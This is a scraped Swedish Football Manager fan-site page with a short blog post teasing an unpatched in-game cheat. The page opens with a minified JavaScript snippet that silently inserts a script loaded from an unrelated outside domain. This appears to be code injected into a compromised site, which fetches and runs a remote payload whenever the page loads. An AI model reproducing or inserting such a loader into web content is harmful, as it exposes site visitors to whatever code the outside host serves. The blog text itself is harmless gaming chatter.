;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dannes Lördagsgodis – Ett helt bisarrt fusk! – FMSweden
Meny Stäng

Dannes Lördagsgodis – Ett helt bisarrt fusk!

I det här avsnittet tänkte jag dela med mig av en vattendelare, nämligen ett fusk. Det kan låta som ett “under bältet”-val att dela med mig av detta men eftersom SI, trots att väldigt många flaggat för det, fortfarande har kvar fusket i spelet så varför inte dela med mig av det? Två gånger har jag använt mig av det; första gången för att det lät helt bisarrt att det faktiskt skulle fungera och andra gången var det för att verkligen dubbelkolla att det fortfarande fungerar. Med den här introduktionen så vill jag presentera; det mest bisarra fusket enligt mig i FM’s historia!

Mer om det HÄR!

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar